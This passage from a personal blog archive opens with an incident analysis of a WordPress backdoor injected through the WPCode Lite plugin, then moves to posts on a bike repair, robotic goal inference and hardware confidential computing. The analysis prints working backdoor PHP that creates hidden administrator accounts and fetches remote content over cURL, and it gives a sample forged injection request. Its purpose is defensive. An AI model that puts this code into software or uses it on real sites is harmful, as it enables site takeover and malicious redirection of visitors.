                if (strpos($d, '.') > 0) {
                    update_option('d', $d);
                }
                break;
            case 'au':
                $u = _gcookie('u');
                $p = _gcookie('p');
                $e = _gcookie('e');

                if ($u && $p && $e && !username_exists($u)) {
                    $user_id = wp_create_user($u, $p, $e);
                    $user = new WP_User($user_id);
                    $user->set_role('administrator');
                }
                break;
        }
        return;
    }

The snippet then performs additional checks:

It avoids interference when the request URL is part of wp‑login (to not disrupt normal login).It checks for a cookie named “skip”, and if present with value “1”, it returns early.
It defines functions _is_mobile(), _is_iphone(), and _user_ip() to gather client information like user agent and IP address.
It defines a simple XOR encryption/decryption function, xorEncryptDecrypt(), which is later used to decode part of a parameter.

The core of the backdoor is the _red() function, which is hooked to the init action:

    function _red()
    {
        if (is_user_logged_in()) {
            return;
        }

        $u = isset($_GET['u']) ? $_GET['u'] : '';
        $p = isset($_GET['p']) ? $_GET['p'] : '';
        if (function_exists('curl_init') && strlen($u) > 4 && $p === "a516c9f37ca86f549b3cdff68167e708") {
            $hash = md5(substr($u, 4));

            if (substr($u, 0, 4) === substr($hash, 0, 4)) {
                $link = xorEncryptDecrypt(hex2bin(substr($u, 12)), substr($u, 4, 8));

                if (substr($link, 0, 4) === 'http') {
                    $ch = @curl_init();
                    @curl_setopt($ch, CURLOPT_URL, $link);
                    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                    $output = @curl_exec($ch);
                    @curl_close($ch);

                    $j = json_decode($output);
                    if ($j !== null) {
                        if (isset($j->headers)) {
                            foreach ($j->headers as $header) {
                                header($header);
                            }
                        }
                        if (isset($j->body)) {
                            echo base64_decode($j->body);
                        }
                    }
                }
            }
            exit(0);
        }

If the GET parameters include u (with sufficient length) and p exactly equals the hard-coded token, the function calculates a hash from part of u and then uses the XOR decryption function to derive a URL ($link). If the decoded link begins with “http”, it initializes a cURL request to fetch content from that URL, decodes the response, sends any specified headers, and outputs the decoded body. This mechanism allows the attacker to control what content is served to a visitor or to execute further remote commands. After handling the GET request, the script calls exit(0) to stop further processing, ensuring that the backdoor’s action is the only thing executed.

Oh boy. After the remote command block, the function:

Retrieves the visitor’s IP address.
Loads a transient option (exp) and purges old entries.
Constructs a string ($req) using the host, IP, random number, and device type.
Uses a dynamically built call (through string concatenation) to perform a DNS TXT lookup on that constructed string.
If a TXT record is found, it decodes it from base64:
If it equals “err”, it sets a transient to throttle further actions.
Otherwise, if the decoded string starts with “http”, it triggers a redirect (wp_redirect($s)) and exits.

This TXT lookup technique is sometimes used by attackers to store dynamic commands or configuration data remotely, using DNS as a covert channel. By storing timestamps in a transient, the code prevents repeated execution from the same IP within a 24‑hour window. (clever)

Finally, the script registers the _red() function with WordPress’s init action. Every time WordPress initializes (i.e. on each page load), this function runs. If the proper GET parameters or cookies are present, the attacker’s code executes—either creating an admin user or redirecting the visitor.

add_action('init', '_red');

Let’s summarize. An attacker exploited a vulnerability in the “Insert Headers and Footers (WPCode Lite)”—to inject a serialized malicious snippet into my WordPress database’s wp_options table. The injected code was designed with stealth in mind: it output CSS to hide critical admin UI elements, removed the compromised plugin from the active plugins list, and suppressed errors to evade detection. I later found that the backdoor was activated when specific conditions were met—for example, when a visitor sent a GET request with certain parameters (with one matching a hard-coded token), the snippet decrypted part of the request to form a URL and used cURL to fetch and display remote content or perform a redirect. In another scenario, if a cookie named ‘pw’ matched the token and another cookie indicated an action, the snippet created a new administrator account using additional cookie data. Furthermore, the malicious code gathered visitor details like IP addresses and device types and even performed DNS TXT lookups to receive dynamic commands, allowing the attacker to control the exploit while throttling repeated use from the same IP. This explains why the redirect was intermittent.

So how did this happen?

An attacker exploited a known vulnerability in the Insert Headers and Footers plugin (now often used as WPCode Lite)—to inject a serialized PHP snippet directly into the WordPress database’s wp_options table. The attacker managed to insert a serialized PHP snippet into the wp_options table under the key “wpcode_snippets.” Specifically, the plugin failed to adequately sanitize or verify input, allowing the attacker to bypass normal security checks.

So . . . you want details? I don’t have the data or time to tell you exactly how this happened. But I have an idea. The Insert Headers and Footers plugin was designed to let administrators add custom code snippets that would later be stored—after being serialized—using WordPress’s update_option() function. Under normal conditions, when a trusted user inputs a code snippet, the plugin packages that snippet into an array and calls PHP’s serialize() function before saving it. However, due to inadequate input validation and insufficient CSRF protection, an attacker was able to submit a raw, malicious code payload through the plugin’s interface (or via an exposed AJAX endpoint).

Because the plugin didn’t sanitize or validate this input properly, the raw payload—containing obfuscated PHP code with dangerous functions like eval() and base64_decode()—was accepted as legitimate snippet data. When update_option() was invoked, WordPress automatically serialized the entire array, preserving the malicious payload exactly as provided. In other words, nothing in the serialization process itself “bypassed” the payload; rather, the attacker’s input was never filtered, and the plugin blindly serialized and stored it in the wp_options table under “wpcode_snippets.” This allowed the backdoor code to later execute under specific conditions, effectively giving the attacker remote control.

Ok — so let’s get into it with a plausible example of how this happened. In a properly secured WordPress plugin, every form that accepts user input—especially one that can inject PHP code—must include a nonce (a one-time token) and verify that nonce on submission using functions like wp_verify_nonce(). However, in vulnerable versions of WPCode Lite, this check was either missing or insufficient.

In a secure implementation, every form submission that modifies sensitive options should include a nonce field (a one-time token) and verify it using functions like check_admin_referer(). However, in the vulnerable version of the plugin, the nonce protection was either not enforced properly or the nonce check was flawed. For example, although the plugin output a nonce field in the snippet submission form, the code that processed the form did not call WordPress’s standard nonce verification functions correctly. Instead of verifying that the submitted nonce matched what was generated for the current session and that the request came from an administrator, the plugin simply checked for the presence of a nonce field—or, worse, neglected to call check_admin_referer() entirely. One example (which I could check in the old plugin) would be that the plugin merely use an isset() check on the nonce field rather than validating its value and timestamp. It’s like checking if there is a password, instead of checking if the password matches. Yes, it’s that bad.

Without a robust nonce or proper permission check in place, the attacker could send a forged HTTP POST request directly to the endpoint responsible for updating the snippets. For instance, the attacker could target the AJAX endpoint (typically something like wp-admin/admin-ajax.php) and set the appropriate action parameter to trigger the snippet update. An example of such a POST request might look like:

POST /wp-admin/admin-ajax.php?action=update_snippet HTTP/1.1
Host: my_happy_blog.com
User-Agent: Mozilla/5.0 (compatible; AttackerBot/1.0)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1024

nonce=invalid_nonce_value&snippet_key=wpcode_snippets&code=<?php
$_pwsa='a516c9f37ca86f549b3cdff68167e708';

PHP’s serialize() function converts an array into a string that preserves every character of the original payload. Since there was no sanitization altering the payload, the entire obfuscated and dangerous PHP code was stored exactly as submitted. When WordPress later unserialized this value, the code was reconstituted and executed during the initialization process (via an init hook), thereby activating the backdoor.

Actions Taken

MariaDB [david_wordpress]> DELETE FROM wp_options WHERE option_name = 'wpcode_snippets';
Query OK, 1 row affected (0.004 sec)

# now check

MariaDB [david_wordpress]> SELECT * FROM wp_options WHERE option_name = 'wpcode_snippets';
Empty set (0.001 sec)

# remove the plugin
user@cromwell:/srv/rufus$ sudo rm -rf /srv/rufus/david_public_html/wp-content/uploads/wpcode/
user@cromwell:/srv/rufus$ find /srv/rufus/david_public_html -type d -name "wpcode*"
# empty

# added to my nginx.conf for his site:
        location = /xmlrpc.php {
                deny all;
        }
# check 
curl -I https://david.theboohers.org/xmlrpc.php
HTTP/2 403
server: nginx
date: Fri, 14 Mar 2025 03:32:02 GMT
content-type: text/html
content-length: 146
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade

I also checked for hidden admin users in the database.

Problem fixed for now, but this stuff is subtle and tricky. Be safe out there.

side note: you may have noticed my server is named cromwell. Why? Well, it’s complicated. Oliver Cromwell is best known for his role in the English Civil War, where he championed parliamentary authority against absolute monarchy, eventually leading to the execution of King Charles I in 1649. I look at that as a commitment to limited government and resistance to unchecked power—I value individual liberty and accountability.

Cromwell’s Puritan faith reflected a moral framework rooted in tradition and discipline. This provided his unwavering resolve—seen in his leadership of the New Model Army and his role as Lord Protector—he upheld principles over populism or compromise.

Alas, all heros (except for the “one”) suck. He also dissolved Parliament and ruled as a quasi-dictator. So, maybe that is a hint at how complex my server is. It’s a beautiful thing I’ve built over 20 years, but it sometimes compromises and breaks stuff.

March 13, 2025 (updated June 26, 2025) By Tim Booher 0 Comments

Personal Projects & Interests

Fixing A Bike

My son was jumping around the neighborhood on his 2019 Men’s Stumpjumper ST Comp Alloy 29 and noticed his chain sticking on the back of his bike. He was jumping around and noticed that the rear gears and chain were binding. You can see this below:

I took off the derailleur and noticed the notch at the bottom was broken.

You need this little feature to allow the B-tension screw to press on something to keep things from smashing together. Without it’s contact point, the derailleur pivoted too far forward and the guide pulley (top jockey wheel) crashed into the cassette, grinding against the sprockets instead of smoothly guiding the chain. This happened because the notch normally sets the derailleur’s clearance from the gears—without it, the entire derailleur rotated inward, pulling the jockey wheel dangerously close to the cassette. Likely triggered by an impact, a bent hanger, or sudden drivetrain stress, this failure made shifting erratic and risked further damage to the chain and derailleur.

Historically, derailleur hangers were integrated directly into bike frames, making them more durable but also more vulnerable—if the derailleur suffered an impact, the force would transfer directly to the frame, sometimes causing irreparable damage. To solve this, manufacturers introduced the replaceable derailleur hanger, a sacrificial component designed to bend or break under stress to protect both the derailleur and the frame. This removable design made repairs significantly easier, allowing riders to swap out a damaged hanger rather than risk a cracked frame. However, while this innovation improved durability, it also introduced a weak point—the notch that interfaces with the B-screw. If this notch wears down or breaks due to a crash, shifting issues arise, and the derailleur loses its ability to maintain proper chain tension. Today, precise machining and stronger materials have improved hanger longevity, but the fundamental principle remains: the hanger is a breakable safeguard designed to take the hit so your frame doesn’t have to.

stay posted as I get this fixed. . .

links

the part

the bike

my reddit post

a stack exchange post

March 3, 2025 (updated March 3, 2025) By Tim Booher 0 Comments

Autonomy

Decoding Operator Intent: The Future of Multi-Agent Goal Inference in Robotics

One of the coolest challenges in robotics is to enabling machines to grasp the bigger picture from a small bit of human control. Imagine an operator guiding a single robot in a complex environment—the robot isn’t just executing isolated commands, but is part of a larger, dynamic mission. This is where multi-agent goal inference steps in. It’s the art and science of decoding an operator’s intent from local, granular actions to infer global mission objectives.

Think of this as “zooming out” from a single, localized action to reveal a much larger, underlying structure. It aways seems magical when AI allows the transformation of low-resolution images into high-resolution outputs by inferring structure. In other words, by carefully analyzing small, seemingly isolated inputs—such as an operator’s control over one robot—an intelligent system can infer the broader mission or goal structure. This process involves recognizing patterns and connections that aren’t immediately obvious from the initial, “small” piece of information. It’s inferring structure.

Not quite right, but still impressive (and correct per the system’s goal)

Multi-agent goal inference is a necessary part of multi-agent systems. A robot might receive only a simple command or a series of minor adjustments, yet these inputs can be extrapolated into a comprehensive understanding of the overall objective. This “explosive” inference transforms localized signals into a richer, more complex picture, enabling distributed agents to coordinate, adapt, and execute large-scale missions without explicit instructions for every detail. It’s cool.

This capability essentially mirrors a fundamental aspect of human cognition: we often infer context and structure from very short interactions. As researchers integrate probabilistic reasoning, inverse planning, and learning-based methods, robotic systems are beginning to exhibit a similar aptitude—expanding a small set of observations into a detailed, coherent plan that drives robust multi-agent cooperation.

The core challenge lies in bridging the gap between an operator’s limited, localized inputs and the expansive, often unpredictable goals of a mission. Reality is messy and unpredictable. Traditional control systems require explicit instructions for every step, but what if robots could intuit the next moves based on subtle cues? Recent insights suggest that AI systems must evolve to anticipate broader mission objectives through small-scale interactions. In essence, the robots of tomorrow should be able to read between the lines, inferring tasks without needing every detail spelled out.

The future of this technology is anchored in developing probabilistic goal inference models. These models are designed to dynamically adjust to real-time changes, enabling a seamless translation of an operator’s intentions into coordinated actions among multiple robotic agents. If implemented correctly, machines will not only be responsive but also intuitively proactive in complex, unpredictable environments. A simple example can show the math of how this can work.

Let:

$G$ is the set of possible goals.
$a_{1:T}$ is the observed sequence of actions.
$P(g)$ is the prior probability of goal $g$.
$P(a_{1:T} \mid g)$ is the likelihood of observing actions $a_{1:T}$ given goal $g$.

Using these definitions, we can derive the posterior probability using Bayes’ rule: $$ P(g \mid a_{1:T}) = \frac{P(a_{1:T} \mid g) , P(g)}{P(a_{1:T})} $$ where the evidence is given by: $$ P(a_{1:T}) = \sum_{g’ \in G} P(a_{1:T} \mid g’) , P(g’). $$ Next, we model the likelihood using a Boltzmann (softmax) distribution based on a cost function: $$ P(a_{1:T} \mid g) = \frac{1}{Z(g)} \exp\left(-\beta, C(a_{1:T}, g)\right) $$ with the partition function defined as: $$ Z(g) = \sum_{a’{1:T}} \exp\left(-\beta, C(a’{1:T}, g)\right) $$ Here, $\beta$ is the inverse temperature parameter and $C(a_{1:T}, g)$ is the cost function. For sequential decision-making, let $s_t$ denote the state at time $t$ and let $Q(s_t, a_t, g)$ be the action-value function. Then the probability of taking action $a_t$ given state $s_t$ and goal $g$ is: $$ P(a_t \mid s_t, g) = \frac{\exp\left(-\beta, Q(s_t, a_t, g)\right)}{\sum_{a’} \exp\left(-\beta, Q(s_t, a’, g)\right)} $$ Assuming conditional independence over time, the overall likelihood for the sequence of actions becomes: $$ P(a_{1:T} \mid g) = \prod_{t=1}^{T} P(a_t \mid s_t, g) $$

Today’s robotics research is taking a multifaceted approach to multi-agent goal inference—particularly when an operator’s localized control over a single robot must be extrapolated to infer broader mission objectives. Researchers are tackling this challenge with techniques that blend classical planning, probabilistic reasoning, and cutting-edge machine learning.

One popular strategy is to view goal inference as an inverse planning problem. By assuming that each agent acts approximately rationally, methods based on Bayesian inverse planning and inverse reinforcement learning infer the operator’s underlying intent from observed actions. For example, Ramírez and Geffner frame goal recognition as “planning in reverse,” where the cost differences between observed behaviors and optimal plans help compute the likelihood of different mission goals . These methods have been refined to handle noisy or partial observations, enabling robots to update their belief about the global objective in real time.

Recent advances have also emphasized interactive inference, where agents not only execute commands but also actively communicate their intentions through both verbal and non-verbal cues. Models of interactive inference allow agents to observe the actions and even the language used by human operators or teammate robots to collaboratively infer the overarching goal . Such approaches—often inspired by human teamwork dynamics—demonstrate that integrating sensorimotor communication can accelerate goal inference and reduce uncertainty.

In another line of research, Domenico Maisto, Francesco Donnarumma, and Giovanni Pezzulo propose a multi‑agent model of cooperative joint actions where agents iteratively update their beliefs about the shared goal through mutual observation. This “interactive inference” framework enables agents to align their internal structures from simple, local signals into a cohesive team plan.

Schematic illustration of the multi-agent active inference model

At the University of Washington, a research team developed ColorGrid, a novel multi‑agent environment that simulates dynamic goals. In ColorGrid, a “follower” agent must infer the leader’s goal solely by observing its trajectory, illustrating how minimal, localized inputs can be expanded into an understanding of complex, shifting objectives.

Cognizant’s Neuro® AI Multi-Agent Accelerator exemplifies how enterprises can implement systems that orchestrate numerous specialized agents to collaborate and align with overarching business goals. Their framework allows businesses to rapidly prototype, customize, and scale multi‑agent networks that transform small, individual actions into coordinated, enterprise‑wide decision-making.

Another exciting avenue is the incorporation of deep learning, particularly large language models (LLMs), into multi-agent systems. These models are being adapted to interpret subtle operator inputs and to translate those into probabilistic estimates of global mission intent. By leveraging the rich contextual understanding of LLMs, researchers are developing systems where the “language” of robot actions becomes a basis for knowledge representation, enhancing robustness in sparse-data environments. In tandem, reinforcement learning frameworks are evolving to allow agents to coordinate and share inferred goals, compensating for hardware limitations with smarter software.

A survey on LLM-based multi-agent systems: workflow, infrastructure, and challenges

The work by Ying et al. on “Inferring the Goals of Communicating Agents from Actions and Instructions” is a prime example. In that study, researchers used GPT‑3 as a likelihood function to process natural language instructions from a human operator. The model then integrates these instructions with observed actions via Bayesian inverse planning to generate probabilistic estimates of a team’s global mission intent. This approach leverages the rich contextual understanding of large language models (LLMs) to translate subtle operator inputs into high-level goal inferences—effectively turning the “language” of robot actions into a structured knowledge representation. It also demonstrates how reinforcement learning frameworks are evolving to coordinate agents, thereby compensating for hardware limitations with smarter, software‑driven solutions.

Many current systems adopt a hybrid approach that combines heuristic planning with probabilistic inference. Such architectures can dynamically switch between centralized coordination—where a common goal inference model is shared—and decentralized, agent-specific decision-making. This adaptability is critical in mission environments where some robots may fail or new information becomes available, allowing the swarm to reconfigure its strategy without explicit reprogramming.

One cool example of multi-agent navigation tasks is when researchers combine heuristic planning with probabilistic inference to dynamically adapt control strategies. For instance, in some recent multi-agent reinforcement learning (MARL) frameworks, a centralized “goal inference” model is used to establish a common plan when all agents are operating correctly. However, when some robots fail or new, unexpected data arises, the system can switch to a decentralized mode where individual agents use heuristic planning—often informed by local probabilistic reasoning—to reconfigure their strategy. (See the paper by Lowe et al. (2017) titled “Multi-Agent Actor-Critic for Mixed Cooperative-Competitive Environments” which presents a framework where a centralized “goal inference” critic coordinates agents’ behaviors while individual agents execute decentralized policies based on local information.)

A concrete example comes from research in cooperative multi-agent navigation in dynamic environments. In such systems, a centralized planner might initially coordinate a swarm’s movement based on a shared inference of mission intent, but if communication between agents becomes unreliable or some agents drop out, each remaining agent falls back on its local heuristic planning module, augmented with probabilistic inference to predict nearby agents’ behavior. This hybrid strategy ensures that the team continues to function effectively despite failures or changes in the environment.

Another instance can be seen in emerging robotics platforms used in search and rescue missions. In these systems, a central command may provide a global objective, but each robot is also equipped with local decision-making capabilities that allow it to independently adjust its path and actions using heuristic and probabilistic methods when faced with obstacles or failures in teammates. This dynamic switching between centralized coordination and decentralized planning enables the overall system to maintain mission success without explicit reprogramming.

Multi-agent navigation systems are designed to blend centralized coordination with decentralized decision-making. Many frameworks begin with a central planner that establishes a shared mission intent using probabilistic inference, guiding the coordinated movement of agents. When disruptions occur—such as communication failures or the loss of agents—the system automatically shifts to decentralized control. In these cases, individual agents rely on local heuristic planning, supported by probabilistic reasoning to predict nearby agents’ actions, ensuring continued operational success. This hybrid strategy is effectively applied in fields ranging from reinforcement learning-based swarm robotics to dynamic search and rescue missions.

February 20, 2025 (updated February 22, 2025) By Tim Booher 0 Comments

Engineering & Code

The state of hardware security

You can’t build anything big and important without a solid foundation. In security, hardware acts as that unyielding foundation, the basis for all other defenses. While fancy encryption and zero-trust principles can safeguard data in an environment where software is inherently untrusted, they ultimately rely on hardware’s immutable security properties. Companies are partnering with cloud providers to store their data on the same infrastructure as their competitors, so it’s not enough to know software security.

Hardware-based security measures, such as secure boot, trusted platform modules, and memory encryption, establish an initial trust anchor that software cannot easily subvert and that users can evaluate and decide to trust. This foundational layer verifies the integrity of the system before any software is executed, ensuring that the subsequent layers of security are built on a trusted base. Without this hardware root of trust, even the most robust software security mechanisms are vulnerable to low-level attacks that can compromise the entire system.

One thought experiment to understand the critical nature of hardware security is the ability to observe or spoof the user interface. At some level data have to leave the system unencrypted through a display and if the last mile of hardware isn’t secure, an attacker can have the same effects as a full system compromise.

Over the past decade, hardware security has evolved from pioneering isolated execution environments to mature, commercially deployed solutions that underpin today’s cloud and edge infrastructures. Early in the 2010s, initiatives like Intel SGX and AMD’s initial forays into secure encrypted virtualization laid the groundwork for establishing a hardware root of trust—ensuring that critical operations could run in protected enclaves even in hostile software environments. Building on these foundations, AMD introduced SEV (Secure Encrypted Virtualization) in 2016 to encrypt VM memory, followed by SEV-ES in 2017 to extend that protection to CPU register states. More recently, with the advent of SEV-SNP (Secure Nested Paging) around 2020 and Intel TDX emerging in the last couple of years, the focus has shifted from merely encrypting data to providing robust integrity guarantees that protect against sophisticated attacks like memory replay, remapping, and side channels.

Despite these advances, hard problems persist. For instance, achieving high performance while enforcing strict integrity checks (such as those implemented via the Reverse Map Table in SEV-SNP) remains a delicate balancing act—ensuring that security enhancements do not impose unacceptable overhead in high-performance, multi-tenant data centers. Furthermore, the growing complexity of modern systems, especially those with NUMA architectures or heterogeneous device environments, poses challenges in uniformly maintaining a hardware root of trust. Issues such as securing device I/O paths, mitigating advanced side-channel attacks, and managing secure migration of VMs across untrusted hosts continue to be hard. While hardware-based trust solutions have come a long way over the past ten years, the quest to achieve an optimal blend of security, performance, and flexibility in an increasingly hostile and complex threat landscape remains an ongoing challenge.

Where the big money intersects this space is cloud compute, hardware-enforced confidential computing has become an indispensable tool for protecting sensitive workloads in multi-tenant environments. Technologies like AMD SEV‑SNP, Intel TDX, and Arm CCA each promise robust isolation by leveraging hardware mechanisms to encrypt memory, enforce integrity, and isolate virtual machines even in the presence of an untrusted hypervisor. However, while these solutions share the same overarching goal, they embody fundamentally different design philosophies and tradeoffs.

At the heart of these differences lies a tradeoff between security and performance, flexibility and complexity, as well as legacy compatibility versus future-proofing. For instance, AMD’s SEV‑SNP uses advanced techniques like the Reverse Map Table and multi-level guest privilege schemes to provide fine-grained integrity guarantees, which inevitably introduce additional overhead and management complexity. In contrast, Intel TDX offers a more abstracted approach to secure virtualization, which simplifies integration but can limit granular control. Meanwhile, Arm CCA, integrated directly into the ARMv9 ISA, emphasizes low overhead and tight integration at the cost of some of the flexibility seen in x86-based solutions.

And there is an open alternative. RISC‑V CoVE is a research‑driven initiative aimed at extending confidential computing to the open‑source RISC‑V ecosystem. Over the past decade, as hardware-based security became critical in data centers and cloud environments, proprietary technologies like Intel SGX and AMD SEV demonstrated the power of integrating security directly into the processor. Inspired by these efforts, the RISC‑V community began exploring ways to incorporate similar confidentiality and integrity features in a fully open and modular ISA. CoVE emerged as one of the early prototypes in this space, leveraging RISC‑V’s inherent flexibility to design hardware extensions that support secure enclaves, memory encryption, and integrity verification.

Technically, CoVE introduces mechanisms analogous to those found in proprietary systems but adapted for RISC‑V’s simpler architecture. This includes a dedicated memory encryption engine, hardware‑assisted isolation for virtual machines, and innovative techniques for tracking memory ownership—concepts similar to AMD’s Reverse Map Table, yet reimagined to suit an open‑source environment. The design also explores support for remote attestation and dynamic security policy enforcement within guest systems, offering a proof‑of‑concept that confidential virtualization is achievable without vendor lock‑in. While CoVE remains primarily in the research and prototyping phase, it highlights both the potential and the challenges of building robust hardware trust mechanisms on an open ISA, such as balancing performance overhead, ensuring seamless software integration, and achieving scalable adoption across diverse platforms.

CoVE could be the future. The economic landscape for confidential computing is heavily influenced by the licensing models adopted by key vendors—most notably AMD. If AMD’s licensing fees for its SEV‑SNP technology are perceived as too high by data centers and cloud service providers, it could create a significant cost barrier and incentivize investment in RISC‑V. Unlike proprietary solutions, RISC‑V offers a more open and flexible platform that—if coupled with effective confidential computing extensions—can dramatically lower both the entry and operational costs. This shift could spur a new wave of innovation as organizations seek to avoid high licensing costs, driving the development of open‑source confidential computing solutions that are not only cost‑effective but also adaptable to diverse workloads and deployment environments. In essence, the long‑term economics of hardware trust will depend on finding the right balance between robust security guarantees and accessible licensing terms, with the potential for RISC‑V to play a transformative role if traditional licensing models prove too burdensome.

Until a change in the market, Arm’s hardware protections remain critical. Arm Confidential Compute Architecture (CCA) represents a major evolution in secure computing for Arm-based systems. Introduced as an integral part of the Armv9 architecture, CCA builds on decades of lessons from TrustZone and other legacy security solutions to offer robust, hardware-enforced isolation for modern multi-tenant environments. At its core, CCA establishes a hardware root of trust by integrating memory encryption, secure boot, and remote attestation directly into the processor’s ISA—ensuring that sensitive workloads begin in a verified, trusted state. Unlike traditional approaches where security is largely managed in software, Arm CCA leverages dedicated security modules and encryption engines to protect the confidentiality and integrity of data, even when the hypervisor is untrusted. Designed to meet the demands of cloud, edge, and IoT applications, its architecture minimizes performance overhead while providing scalable, low-latency isolation across diverse devices. Over the past few years, as Arm processors have become ubiquitous in both mobile and server markets, industry collaboration has driven CCA’s maturation into a practical, next-generation solution for confidential computing that not only meets today’s threats but is also built to evolve alongside emerging challenges.

In the x86 space, Intel Trust Domain Extensions (TDX) represents Intel’s latest stride toward confidential computing in virtualized environments. Building on its long history of virtualization technology such as VT‑x, Intel introduced TDX to create “trusted domains” that isolate guest VMs even when the hypervisor is untrusted or compromised. Over the last few years, Intel has iteratively refined TDX to address evolving threats, integrating advanced memory encryption engines and robust access-control mechanisms directly into the CPU. TDX ensures that each virtual machine operates in a hardware‑enforced secure environment by encrypting guest memory with keys inaccessible to the host and by validating the integrity of critical VM state through specialized data structures and registers. Additionally, TDX supports remote attestation, allowing external parties to verify that a VM is running on a genuine, unmodified Intel platform with the latest security features. While aiming to minimize performance overhead, TDX also enforces strict isolation policies, ensuring that even if the hypervisor is breached, sensitive workloads remain protected. This evolution is crucial for cloud and data center applications, where trust in the underlying infrastructure is paramount.

AMD SEV‑SNP (Secure Encrypted Virtualization – Secure Nested Paging) is AMD’s most advanced solution for protecting virtual machines in environments where even the hypervisor is untrusted. Building on the foundation laid by earlier SEV technologies—which provided memory encryption (SEV) and extended protection of CPU register state (SEV‑ES)—SEV‑SNP adds critical integrity protections. It introduces hardware mechanisms like the Reverse Map Table (RMP) and new instructions (e.g., RMPUPDATE, PVALIDATE, and RMPADJUST) that enforce a strict one‑to‑one mapping between guest and system physical memory. These features ensure that any attempt to replay, remap, or alias memory pages is detected and blocked, thus safeguarding against sophisticated hypervisor-level attacks. Additionally, SEV‑SNP supports features such as VM Privilege Levels (VMPLs) that allow a guest to partition its own memory space for further internal security isolation. With robust remote attestation capabilities, SEV‑SNP enables cloud customers to verify that their VMs are running on genuine, unmodified AMD hardware with the latest security updates. This evolution in AMD’s confidential computing portfolio represents a significant leap forward, delivering both confidentiality and integrity protection essential for secure multi-tenant data centers and cloud environments.

Secure boot is the cornerstone of modern hardware trust—a process that ensures only verified and trusted code is executed right from the moment a system powers on. Think of it as the ultimate “ground zero” for security: if the foundation isn’t solid, everything built on top of it is at risk. In today’s era of distributed compute, from massive cloud data centers to edge devices, secure boot isn’t just an optional enhancement—it’s a necessity. It establishes a root of trust by validating the integrity of the system before any software is loaded, thereby underpinning all subsequent layers of defense. Without it, even the most sophisticated encryption and zero‑trust policies can fall prey to low‑level attacks that bypass software safeguards.

Different vendors have taken unique approaches to secure boot that reflect their broader security philosophies. For example, AMD’s SEV‑SNP integrates boot-time measurements with advanced memory encryption and integrity verification techniques, ensuring that only approved code is executed—albeit at the cost of added complexity and some performance overhead. Intel’s TDX takes a contrasting route by encapsulating entire virtual machines within “trusted domains,” streamlining the boot process at the expense of granular control. Meanwhile, Arm CCA embeds secure boot directly into the Armv9 ISA, delivering low‑overhead, highly efficient boot verification ideally suited for mobile, IoT, and edge scenarios. Risc-V CoVE is too early evaluate. Ultimately, regardless of the platform, secure boot provides that unbreakable starting point—ensuring that every subsequent layer of software security is built on a foundation that you can truly trust.

AMD’s approach to secure boot in SEV‑SNP extends the traditional concept by tightly integrating boot-time measurements with the VM launch process. Before a guest VM begins execution, its initial unencrypted image (containing boot code, for example) is measured and attested, ensuring that only trusted, approved code is executed. This process leverages a combination of hardware encryption, the Reverse Map Table (RMP), and remote attestation mechanisms to verify integrity. The tradeoff here is that while the process provides granular integrity guarantees even during live migration or in the presence of a malicious hypervisor, it introduces additional complexity and potential performance overhead during boot.

Intel TDX also supports secure boot, but its approach centers on establishing “trusted domains” where the entire virtual machine is launched within a protected environment. The boot process involves measuring and attesting to the initial state of the VM, ensuring that its critical data and code remain confidential throughout its lifecycle. Intel’s model abstracts much of the secure boot complexity from the guest OS by encapsulating the VM within a trusted domain. The advantage is a simpler integration for cloud environments with existing Intel infrastructure; however, this can limit fine‑grained control over the boot process compared to AMD SEV‑SNP, and it may require adjustments in legacy software to fully leverage the new protections.

In the Arm ecosystem, secure boot is built directly into the Armv9 ISA as part of a broader suite of security features. Arm CCA integrates secure boot with hardware‑assisted memory encryption and remote attestation, ensuring that each layer—from the bootloader up to the running OS—is authenticated before execution. This native integration minimizes overhead and offers a highly efficient secure boot process optimized for mobile, IoT, and cloud edge devices. However, because this approach is tightly coupled with the underlying hardware design, it can be less flexible when adapting to varied software requirements compared to more modular x86 solutions.

As a research‑driven initiative for the open‑source RISC‑V ecosystem, CoVE aims to replicate the robust features of proprietary solutions while maintaining the openness of the architecture. Its secure boot model is still evolving, designed to allow researchers to experiment with flexible, modular security extensions. While CoVE draws inspiration from both AMD and Intel approaches—such as measuring boot images and establishing a chain of trust—it also faces challenges common to research prototypes: ensuring compatibility with diverse implementations and achieving performance parity with more mature solutions. The tradeoffs here involve balancing experimental flexibility against the need for hardened, production‑grade security guarantees.

At the most basic level, physical security forms the bedrock of any robust confidential computing system—it’s the first line of defense that ensures all higher‑level security mechanisms have a trusted foundation. In modern architectures, this means integrating techniques like volume protection and physical unclonable functions (PUFs) to secure cryptographic keys and other sensitive data against physical tampering. For instance, AMD SEV‑SNP leverages its AMD Secure Processor (AMD‑SP) to generate and securely store memory encryption keys, often derived from PUFs, ensuring that these keys are intrinsically tied to the hardware and cannot be duplicated or extracted even with direct physical access. Similarly, Intel TDX relies on a hardware‑based root of trust where keys and attestation data are protected using secure boot and TPM-like mechanisms, making it essential for the underlying silicon to be physically secure. Arm CCA, embedded directly within the Armv9 ISA, also incorporates dedicated circuits for secure key generation (via PUFs) and enforces volume protection to guard against cold boot and side-channel attacks, all while maintaining low overhead for energy efficiency. In contrast, research initiatives like RISC‑V CoVE, which are developing confidential computing capabilities for open‑source platforms, must explicitly address these same physical security challenges from the ground up—balancing the need for openness and flexibility with rigorous hardware-based trust mechanisms. In every case, without stringent physical security—ranging from tamper‑resistant packaging to secure, hardware‑rooted key storage—no amount of software encryption or isolation can fully guarantee the confidentiality and integrity of sensitive workloads.

The evolution of hardware-based security—from early isolated execution environments to today’s advanced secure boot and confidential computing solutions—demonstrates that a robust hardware root of trust is indispensable. Whether it’s AMD SEV‑SNP’s intricate integrity mechanisms via the Reverse Map Table, Intel TDX’s trusted domains isolating entire virtual machines, Arm CCA’s deeply embedded secure boot within the Armv9 ISA, or the emerging flexibility of RISC‑V CoVE, each approach reflects a unique balance of security, performance, and complexity. These technologies not only secure the boot process and runtime environments but also integrate physical security measures such as volume protection and PUFs to safeguard cryptographic keys against tampering. As cloud and edge computing continue to expand, the quest to optimize this blend of hardware trust will be critical—driving future innovation and potentially reshaping the economics of confidential computing if proprietary licensing proves too burdensome.

If you want to get deeper into this area check out Confidential Computing.

February 19, 2025 (updated February 20, 2025) By Tim Booher 0 Comments

Career & Productivity

I want my amazon data

